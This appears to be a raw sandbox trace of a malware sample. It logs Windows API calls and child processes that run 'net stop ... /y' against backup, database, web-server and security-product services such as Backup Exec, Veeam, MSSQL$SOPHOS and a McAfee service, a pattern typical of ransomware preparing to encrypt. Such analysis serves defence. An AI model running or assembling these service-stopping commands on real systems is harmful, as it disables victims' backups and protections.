"BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 596 os_tid = 0x13e8 [0115.657] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xefaec | out: lpSystemTimeAsFileTime=0xefaec*(dwLowDateTime=0x18b07950, dwHighDateTime=0x1d6f0d1)) [0115.657] GetCurrentProcessId () returned 0x13e4 [0115.657] GetCurrentThreadId () returned 0x13e8 [0115.657] GetTickCount () returned 0x115038a [0115.657] QueryPerformanceCounter (in: lpPerformanceCount=0xefae4 | out: lpPerformanceCount=0xefae4*=23475776811) returned 1 [0115.657] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0115.657] __set_app_type (_Type=0x1) [0115.657] __p__fmode () returned 0x770331f4 [0115.657] __p__commode () returned 0x770331fc [0115.657] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0115.658] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0115.658] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0115.658] GetConsoleOutputCP () returned 0x1b5 [0115.658] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0115.658] SetThreadUILanguage (LangId=0x0) returned 0x409 [0115.662] sprintf_s (in: _DstBuf=0xefaa4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0115.662] setlocale (category=0, locale=".437") returned="English_United States.437" [0115.665] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3f8 [0115.665] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0115.665] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecVSSProvider /y" [0115.665] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xef870, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0115.665] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x7e) returned 0x6c3af8 [0115.665] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0115.665] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xefa74 | out: Buffer=0xefa74*=0x6c1b00) returned 0x0 [0115.665] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xefa74 | out: Buffer=0xefa74*=0x6c1b18) returned 0x0 [0115.665] _fileno (_File=0x77032900) returned -2 [0115.665] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0115.666] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0115.666] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0115.666] _wcsicmp (_String1="config", _String2="stop") returned -16 [0115.666] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0115.666] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0115.666] _wcsicmp (_String1="file", _String2="stop") returned -13 [0115.666] _wcsicmp (_String1="files", _String2="stop") returned -13 [0115.666] _wcsicmp (_String1="group", _String2="stop") returned -12 [0115.666] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0115.666] _wcsicmp (_String1="help", _String2="stop") returned -11 [0115.666] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0115.666] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0115.666] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0115.666] _wcsicmp (_String1="session", _String2="stop") returned -15 [0115.666] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0115.666] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0115.666] _wcsicmp (_String1="share", _String2="stop") returned -12 [0115.666] _wcsicmp (_String1="start", _String2="stop") returned -14 [0115.666] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0115.666] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0115.666] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0115.666] _wcsicmp (_String1="accounts", _String2="BackupExecVSSProvider") returned -1 [0115.666] _wcsicmp (_String1="computer", _String2="BackupExecVSSProvider") returned 1 [0115.666] _wcsicmp (_String1="config", _String2="BackupExecVSSProvider") returned 1 [0115.666] _wcsicmp (_String1="continue", _String2="BackupExecVSSProvider") returned 1 [0115.666] _wcsicmp (_String1="cont", _String2="BackupExecVSSProvider") returned 1 [0115.666] _wcsicmp (_String1="file", _String2="BackupExecVSSProvider") returned 4 [0115.667] _wcsicmp (_String1="files", _String2="BackupExecVSSProvider") returned 4 [0115.667] _wcsicmp (_String1="group", _String2="BackupExecVSSProvider") returned 5 [0115.667] _wcsicmp (_String1="groups", _String2="BackupExecVSSProvider") returned 5 [0115.667] _wcsicmp (_String1="help", _String2="BackupExecVSSProvider") returned 6 [0115.667] _wcsicmp (_String1="helpmsg", _String2="BackupExecVSSProvider") returned 6 [0115.667] _wcsicmp (_String1="localgroup", _String2="BackupExecVSSProvider") returned 10 [0115.667] _wcsicmp (_String1="pause", _String2="BackupExecVSSProvider") returned 14 [0115.667] _wcsicmp (_String1="session", _String2="BackupExecVSSProvider") returned 17 [0115.667] _wcsicmp (_String1="sessions", _String2="BackupExecVSSProvider") returned 17 [0115.667] _wcsicmp (_String1="sess", _String2="BackupExecVSSProvider") returned 17 [0115.667] _wcsicmp (_String1="share", _String2="BackupExecVSSProvider") returned 17 [0115.667] _wcsicmp (_String1="start", _String2="BackupExecVSSProvider") returned 17 [0115.667] _wcsicmp (_String1="stats", _String2="BackupExecVSSProvider") returned 17 [0115.667] _wcsicmp (_String1="statistics", _String2="BackupExecVSSProvider") returned 17 [0115.667] _wcsicmp (_String1="stop", _String2="BackupExecVSSProvider") returned 17 [0115.667] _wcsicmp (_String1="time", _String2="BackupExecVSSProvider") returned 18 [0115.667] _wcsicmp (_String1="user", _String2="BackupExecVSSProvider") returned 19 [0115.667] _wcsicmp (_String1="users", _String2="BackupExecVSSProvider") returned 19 [0115.667] _wcsicmp (_String1="msg", _String2="BackupExecVSSProvider") returned 11 [0115.667] _wcsicmp (_String1="messenger", _String2="BackupExecVSSProvider") returned 11 [0115.667] _wcsicmp (_String1="receiver", _String2="BackupExecVSSProvider") returned 16 [0115.667] _wcsicmp (_String1="rcv", _String2="BackupExecVSSProvider") returned 16 [0115.667] _wcsicmp (_String1="netpopup", _String2="BackupExecVSSProvider") returned 12 [0115.667] _wcsicmp (_String1="redirector", _String2="BackupExecVSSProvider") returned 16 [0115.667] _wcsicmp (_String1="redir", _String2="BackupExecVSSProvider") returned 16 [0115.667] _wcsicmp (_String1="rdr", _String2="BackupExecVSSProvider") returned 16 [0115.667] _wcsicmp (_String1="workstation", _String2="BackupExecVSSProvider") returned 21 [0115.668] _wcsicmp (_String1="work", _String2="BackupExecVSSProvider") returned 21 [0115.668] _wcsicmp (_String1="wksta", _String2="BackupExecVSSProvider") returned 21 [0115.668] _wcsicmp (_String1="prdr", _String2="BackupExecVSSProvider") returned 14 [0115.668] _wcsicmp (_String1="devrdr", _String2="BackupExecVSSProvider") returned 2 [0115.668] _wcsicmp (_String1="lanmanworkstation", _String2="BackupExecVSSProvider") returned 10 [0115.668] _wcsicmp (_String1="server", _String2="BackupExecVSSProvider") returned 17 [0115.668] _wcsicmp (_String1="svr", _String2="BackupExecVSSProvider") returned 17 [0115.668] _wcsicmp (_String1="srv", _String2="BackupExecVSSProvider") returned 17 [0115.668] _wcsicmp (_String1="lanmanserver", _String2="BackupExecVSSProvider") returned 10 [0115.668] _wcsicmp (_String1="alerter", _String2="BackupExecVSSProvider") returned -1 [0115.668] _wcsicmp (_String1="netlogon", _String2="BackupExecVSSProvider") returned 12 [0115.668] _wcsupr (in: _String="BackupExecVSSProvider" | out: _String="BACKUPEXECVSSPROVIDER") returned="BACKUPEXECVSSPROVIDER" [0115.668] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6c54d8 [0115.839] GetServiceKeyNameW (in: hSCManager=0x6c54d8, lpDisplayName="BACKUPEXECVSSPROVIDER", lpServiceName=0x39aaf0, lpcchBuffer=0xefa10 | out: lpServiceName="", lpcchBuffer=0xefa10) returned 0 [0115.839] _wcsicmp (_String1="msg", _String2="BACKUPEXECVSSPROVIDER") returned 11 [0115.839] _wcsicmp (_String1="messenger", _String2="BACKUPEXECVSSPROVIDER") returned 11 [0115.839] _wcsicmp (_String1="receiver", _String2="BACKUPEXECVSSPROVIDER") returned 16 [0115.839] _wcsicmp (_String1="rcv", _String2="BACKUPEXECVSSPROVIDER") returned 16 [0115.839] _wcsicmp (_String1="redirector", _String2="BACKUPEXECVSSPROVIDER") returned 16 [0115.839] _wcsicmp (_String1="redir", _String2="BACKUPEXECVSSPROVIDER") returned 16 [0115.839] _wcsicmp (_String1="rdr", _String2="BACKUPEXECVSSPROVIDER") returned 16 [0115.840] _wcsicmp (_String1="workstation", _String2="BACKUPEXECVSSPROVIDER") returned 21 [0115.840] _wcsicmp (_String1="work", _String2="BACKUPEXECVSSPROVIDER") returned 21 [0115.840] _wcsicmp (_String1="wksta", _String2="BACKUPEXECVSSPROVIDER") returned 21 [0115.840] _wcsicmp (_String1="prdr", _String2="BACKUPEXECVSSPROVIDER") returned 14 [0115.840] _wcsicmp (_String1="devrdr", _String2="BACKUPEXECVSSPROVIDER") returned 2 [0115.840] _wcsicmp (_String1="lanmanworkstation", _String2="BACKUPEXECVSSPROVIDER") returned 10 [0115.840] _wcsicmp (_String1="server", _String2="BACKUPEXECVSSPROVIDER") returned 17 [0115.840] _wcsicmp (_String1="svr", _String2="BACKUPEXECVSSPROVIDER") returned 17 [0115.840] _wcsicmp (_String1="srv", _String2="BACKUPEXECVSSPROVIDER") returned 17 [0115.840] _wcsicmp (_String1="lanmanserver", _String2="BACKUPEXECVSSPROVIDER") returned 10 [0115.840] _wcsicmp (_String1="alerter", _String2="BACKUPEXECVSSPROVIDER") returned -1 [0115.840] _wcsicmp (_String1="netlogon", _String2="BACKUPEXECVSSPROVIDER") returned 12 [0115.840] NetServiceControl (in: servername=0x0, service="BACKUPEXECVSSPROVIDER", opcode=0x0, arg=0x0, bufptr=0xefa0c | out: bufptr=0xefa0c) returned 0x889 [0115.841] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0115.841] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0115.842] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0115.843] GetFileType (hFile=0x0) returned 0x0 [0115.843] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x6c3ef8 [0115.843] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x6c3ef8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\nk", lpUsedDefaultChar=0x0) returned 30 [0115.843] WriteFile (in: hFile=0x0, lpBuffer=0x6c3ef8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0xef94c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xef94c, lpOverlapped=0x0) returned 0 [0115.843] LocalFree (hMem=0x6c3ef8) returned 0x0 [0115.843] GetFileType (hFile=0x0) returned 0x0 [0115.843] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6c61a0 [0115.843] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6c61a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nl", lpUsedDefaultChar=0x0) returned 2 [0115.843] WriteFile (in: hFile=0x0, lpBuffer=0x6c61a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xef94c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xef94c, lpOverlapped=0x0) returned 0 [0115.843] LocalFree (hMem=0x6c61a0) returned 0x0 [0115.843] _ultow (in: _Dest=0x889, _Radix=981372 | out: _Dest=0x889) returned="2185" [0115.843] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0115.843] GetFileType (hFile=0x0) returned 0x0 [0115.843] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x6c61a0 [0115.843] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x6c61a0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0115.843] WriteFile (in: hFile=0x0, lpBuffer=0x6c61a0, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0xef958, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xef958, lpOverlapped=0x0) returned 0 [0115.844] LocalFree (hMem=0x6c61a0) returned 0x0 [0115.844] GetFileType (hFile=0x0) returned 0x0 [0115.844] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6c61a0 [0115.844] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6c61a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nl", lpUsedDefaultChar=0x0) returned 2 [0115.844] WriteFile (in: hFile=0x0, lpBuffer=0x6c61a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xef958, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xef958, lpOverlapped=0x0) returned 0 [0115.844] LocalFree (hMem=0x6c61a0) returned 0x0 [0115.844] NetApiBufferFree (Buffer=0x6c1b00) returned 0x0 [0115.844] NetApiBufferFree (Buffer=0x6c1b18) returned 0x0 [0115.844] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecVSSProvider /y" [0115.844] exit (_Code=2) Process: id = "203" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6b65a000" os_pid = "0xaf0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop mfemms /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 597 os_tid = 0xa34 Process: id = "204" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6095f000" os_pid = "0xf30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop “Veeam Backup Catalog Data Service” /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 598 os_tid = 0x824 Process: id = "205" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6676c000" os_pid = "0x700" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSSQL$SOPHOS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 599 os_tid = 0xfd4 Process: id = "206" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x60f71000" os_pid = "0xca8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop IISAdmin /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 600 os_tid = 0xcf8 Process: id = "207" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6ae07000" os_pid = "0xde0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "84" os_parent_pid = "0xef8" cmd_line = "C:\\Windows\\system32\\net1 stop BackupExecJobEngine /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 601 os_tid = 0xc10 [0116.635] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff4c | out: lpSystemTimeAsFileTime=0x18ff4c*(dwLowDateTime=0x19440e90, dwHighDateTime=0x1d6f0d1)) [0116.635] GetCurrentProcessId () returned 0xde0 [0116.635] GetCurrentThreadId () returned 0xc10 [0116.635] GetTickCount () returned 0x1150751 [0116.635] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff44 | out: lpPerformanceCount=0x18ff44*=23573581162) returned 1 [0116.635] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0116.635] __set_app_type (_Type=0x1) [0116.635] __p__fmode () returned 0x770331f4 [0116.636] __p__commode () returned 0x770331fc [0116.636] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0116.636] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0116.636] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0116.636] GetConsoleOutputCP () returned 0x1b5 [0116.637] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0116.637] SetThreadUILanguage (LangId=0x0) returned 0x409 [0116.838] sprintf_s (in: _DstBuf=0x18ff04, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0116.838] setlocale (category=0, locale=".437") returned="English_United States.437" [0116.841] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3f8 [0116.841] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0116.841] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecJobEngine /y" [0116.841] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fcd0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0116.841] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x7a) returned 0x483af0 [0116.841] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0116.842] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x18fed4 | out: Buffer=0x18fed4*=0x481af8) returned 0x0 [0116.842] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x18fed4 | out: Buffer=0x18fed4*=0x481b10) returned 0x0 [0116.842] _fileno (_File=0x77032900) returned -2 [0116.842] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0116.842] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0116.842] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0116.842] _wcsicmp (_String1="config", _String2="stop") returned -16 [0116.842] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0116.842] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0116.842] _wcsicmp (_String1="file", _String2="stop") returned -13 [0116.842] _wcsicmp (_String1="files", _String2="stop") returned -13 [0116.842] _wcsicmp (_String1="group", _String2="stop") returned -12 [0116.842] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0116.842] _wcsicmp (_String1="help", _String2="stop") returned -11 [0116.842] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0116.842] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0116.842] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0116.842] _wcsicmp (_String1="session", _String2="stop") returned -15 [0116.842] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0116.842] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0116.842] _wcsicmp (_String1="share", _String2="stop") returned -12 [0116.842] _wcsicmp (_String1="start", _String2="stop") returned -14 [0116.842] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0116.842] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0116.842] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0116.842] _wcsicmp (_String1="accounts", _String2="BackupExecJobEngine") returned -1 [0116.842] _wcsicmp (_String1="computer", _String2="BackupExecJobEngine") returned 1 [0116.842] _wcsicmp (_String1="config", _String2="BackupExecJobEngine") returned 1 [0116.842] _wcsicmp (_String1="continue", _String2="BackupExecJobEngine") returned 1 [0116.843] _wcsicmp (_String1="cont", _String2="BackupExecJobEngine") returned 1 [0116.843] _wcsicmp (_String1="file", _String2="BackupExecJobEngine") returned 4 [0116.843] _wcsicmp (_String1="files", _String2="BackupExecJobEngine") returned 4 [0116.843] _wcsicmp (_String1="group", _String2="BackupExecJobEngine") returned 5 [0116.843] _wcsicmp (_String1="groups", _String2="BackupExecJobEngine") returned 5 [0116.843] _wcsicmp (_String1="help", _String2="BackupExecJobEngine") returned 6 [0116.843] _wcsicmp (_String1="helpmsg", _String2="BackupExecJobEngine") returned 6 [0116.843] _wcsicmp (_String1="localgroup", _String2="BackupExecJobEngine") returned 10 [0116.843] _wcsicmp (_String1="pause", _String2="BackupExecJobEngine") returned 14 [0116.843] _wcsicmp (_String1="session", _String2="BackupExecJobEngine") returned 17 [0116.843] _wcsicmp (_String1="sessions", _String2="BackupExecJobEngine") returned 17 [0116.843] _wcsicmp (_String1="sess", _String2="BackupExecJobEngine") returned 17 [0116.843] _wcsicmp (_String1="share", _String2="BackupExecJobEngine") returned 17 [0116.843] _wcsicmp (_String1="start", _String2="BackupExecJobEngine") returned 17 [0116.843] _wcsicmp (_String1="stats", _String2="BackupExecJobEngine") returned 17 [0116.843] _wcsicmp (_String1="statistics", _String2="BackupExecJobEngine") returned 17 [0116.843] _wcsicmp (_String1="stop", _String2="BackupExecJobEngine") returned 17 [0116.843] _wcsicmp (_String1="time", _String2="BackupExecJobEngine") returned 18 [0116.843] _wcsicmp (_String1="user", _String2="BackupExecJobEngine") returned 19 [0116.843] _wcsicmp (_String1="users", _String2="BackupExecJobEngine") returned 19 [0116.843] _wcsicmp (_String1="msg", _String2="BackupExecJobEngine") returned 11 [0116.843] _wcsicmp (_String1="messenger", _String2="BackupExecJobEngine") returned 11 [0116.843] _wcsicmp (_String1="receiver", _String2="BackupExecJobEngine") returned 16 [0116.843] _wcsicmp (_String1="rcv", _String2="BackupExecJobEngine") returned 16 [0116.843] _wcsicmp (_String1="netpopup", _String2="BackupExecJobEngine") returned 12 [0116.843] _wcsicmp (_String1="redirector", _String2="BackupExecJobEngine") returned 16 [0116.843] _wcsicmp (_String1="redir", _String2="BackupExecJobEngine") returned 16 [0116.843] _wcsicmp (_String1="rdr", _String2="BackupExecJobEngine") returned 16 [0116.843] _wcsicmp (_String1="workstation", _String2="BackupExecJobEngine") returned 21 [0116.843] _wcsicmp (_String1="work", _String2="BackupExecJobEngine") returned 21 [0116.843] _wcsicmp (_String1="wksta", _String2="BackupExecJobEngine") returned 21 [0116.843] _wcsicmp (_String1="prdr", _String2="BackupExecJobEngine") returned 14 [0116.843] _wcsicmp (_String1="devrdr", _String2="BackupExecJobEngine") returned 2 [0116.844] _wcsicmp (_String1="lanmanworkstation", _String2="BackupExecJobEngine") returned 10 [0116.844] _wcsicmp (_String1="server", _String2="BackupExecJobEngine") returned 17 [0116.844] _wcsicmp (_String1="svr", _String2="BackupExecJobEngine") returned 17 [0116.844] _wcsicmp (_String1="srv", _String2="BackupExecJobEngine") returned 17 [0116.844] _wcsicmp (_String1="lanmanserver", _String2="BackupExecJobEngine") returned 10 [0116.844] _wcsicmp (_String1="alerter", _String2="BackupExecJobEngine") returned -1 [0116.844] _wcsicmp (_String1="netlogon", _String2="BackupExecJobEngine") returned 12 [0116.844] _wcsupr (in: _String="BackupExecJobEngine" | out: _String="BACKUPEXECJOBENGINE") returned="BACKUPEXECJOBENGINE" [0116.844] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4854d0 [0116.879] GetServiceKeyNameW (in: hSCManager=0x4854d0, lpDisplayName="BACKUPEXECJOBENGINE", lpServiceName=0x39aaf0, lpcchBuffer=0x18fe70 | out: lpServiceName="", lpcchBuffer=0x18fe70) returned 0 [0116.880] _wcsicmp (_String1="msg", _String2="BACKUPEXECJOBENGINE") returned 11 [0116.880] _wcsicmp (_String1="messenger", _String2="BACKUPEXECJOBENGINE") returned 11 [0116.880] _wcsicmp (_String1="receiver", _String2="BACKUPEXECJOBENGINE") returned 16 [0116.880] _wcsicmp (_String1="rcv", _String2="BACKUPEXECJOBENGINE") returned 16 [0116.880] _wcsicmp (_String1="redirector", _String2="BACKUPEXECJOBENGINE") returned 16 [0116.880] _wcsicmp (_String1="redir", _String2="BACKUPEXECJOBENGINE") returned 16 [0116.880] _wcsicmp (_String1="rdr", _String2="BACKUPEXECJOBENGINE") returned 16 [0116.880] _wcsicmp (_String1="workstation", _String2="BACKUPEXECJOBENGINE") returned 21 [0116.880] _wcsicmp (_String1="work", _String2="BACKUPEXECJOBENGINE") returned 21 [0116.880] _wcsicmp (_String1="wksta", _String2="BACKUPEXECJOBENGINE") returned 21 [0116.880] _wcsicmp (_String1="prdr", _String2="BACKUPEXECJOBENGINE") returned 14 [0116.880] _wcsicmp (_String1="devrdr", _String2="BACKUPEXECJOBENGINE") returned 2 [0116.880] _wcsicmp (_String1="lanmanworkstation", _String2="BACKUPEXECJOBENGINE") returned 10 [0116.880] _wcsicmp (_String1="server", _String2="BACKUPEXECJOBENGINE") returned 17 [0116.880] _wcsicmp (_String1="svr", _String2="BACKUPEXECJOBENGINE") returned 17 [0116.880] _wcsicmp (_String1="srv", _String2="BACKUPEXECJOBENGINE") returned 17 [0116.880] _wcsicmp (_String1="lanmanserver", 